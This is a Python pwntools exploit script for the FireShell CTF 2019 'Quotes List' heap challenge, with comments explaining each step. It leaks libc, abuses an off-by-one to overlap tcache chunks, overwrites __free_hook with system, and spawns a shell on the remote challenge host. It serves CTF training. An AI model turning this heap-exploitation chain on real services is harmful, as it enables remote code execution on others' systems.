FireShell CTF 2019 Quotes List
from pwn import *
import re
def alloc(size, content):
    """Select menu entry '1' on the global connection `p` to create a quote.

    Answers the '> ', 'Length: ' and 'Content: ' prompts in that order;
    `size` is sent as a decimal string, `content` is sent raw (no newline).
    """
    replies = (('> ', '1'), ('Length: ', str(size)))
    for prompt, answer in replies:
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('Content: ')
    p.send(content)
def edit(idx, content):
    """Select menu entry '2' on the global connection `p` to rewrite quote `idx`.

    Answers the '> ', 'Index: ' and 'Content: ' prompts in that order;
    `content` is sent raw (no newline appended).
    """
    for prompt, answer in (('> ', '2'), ('Index: ', str(idx))):
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('Content: ')
    p.send(content)
def free(idx):
    """Select menu entry '4' on the global connection `p` to delete quote `idx`."""
    for prompt, answer in (('> ', '4'), ('Index: ', str(idx))):
        p.recvuntil(prompt)
        p.sendline(answer)
def show(idx):
    """Select menu entry '3' on the global connection `p` to display quote `idx`.

    Returns everything received up to and including the '---' separator,
    which the caller parses for the 'Quote: ' line.
    """
    for prompt, answer in (('> ', '3'), ('Index: ', str(idx))):
        p.recvuntil(prompt)
        p.sendline(answer)
    return p.recvuntil('---')
def exploit():
    """Run the full chain against the global connection `p`.

    The steps are heap-state dependent, so the statement order must not be
    changed. As the inline comments describe: a freed large chunk is
    re-allocated to leak a libc pointer, an off-by-one write enlarges a
    neighbouring chunk's size field so two tcache entries overlap, the
    overlapped free-list pointer is redirected to __free_hook, and freeing
    a chunk that holds "/bin/sh" invokes the replaced hook.

    The constants 0x25, 0x16ab and 0x36d62d are offsets relative to the
    leaked pointer; they are presumably specific to the challenge's libc
    build (see the commented-out local LD_PRELOAD line in __main__).
    Written for Python 2 (print statement, str payloads).
    """
    alloc(0x1000, 'A')  # allocate large chunk to leak libc
    alloc(0x40-8, 'B')
    free(0)  # free it now it will go to unsorted bin
    alloc(0x40-8, 'B')  # allocate from unsorted bin
    # `libc` first holds the raw leaked bytes after 'Quote: ' ...
    libc = re.findall('Quote: ' + '(.*)', show(0))[0]  # leak libc
    # ... and is then rebound to the adjusted 64-bit address.
    libc = u64(libc.ljust(8, '\x00')) - 0x25
    print hex(libc)
    alloc(0x40-8, 'C')  # prepare the heap for chunk overlap
    alloc(0x40-8, 'D')  # another chunk for overlap
    edit(0, 'B'*(0x40-8) + '\x81')  # off by one and modify next size
    free(3)  # it will go to tcache of size 0x40
    free(2)  # it will go to tcache of size 0x80 we have overlap with 3
    __free_hook = libc + 0x16ab
    alloc(0x80-8, 'A'*(0x40-8) + p64(0x41) + __free_hook)  # allocate over 3 now we override fd of 2 to __free_hook
    alloc(0x40-8, '/bin/sh\x00')  # first alloc prepare our string
    system = libc - 0x36d62d
    alloc(0x40-8, p64(system))  # second alloc will override __free_hook to system
    free(3)  # trigger __free_hook on 3 that contains binsh
if __name__ == '__main__':
    # `p` is a module-level global: every helper above and exploit() use it.
    # Remote target by default; the commented-out lines run the binary
    # locally under the bundled loader/libc and optionally attach gdb.
    p = remote('challs.fireshellsecurity.team', 31008)
    # p = process(['./ld-linux-x86-64.so.2', './quotes_list'], env={'LD_PRELOAD': './libc.so.6'})
    # gdb.attach(p)
    exploit()
    p.interactive()  # hand the connection over to the terminal afterwards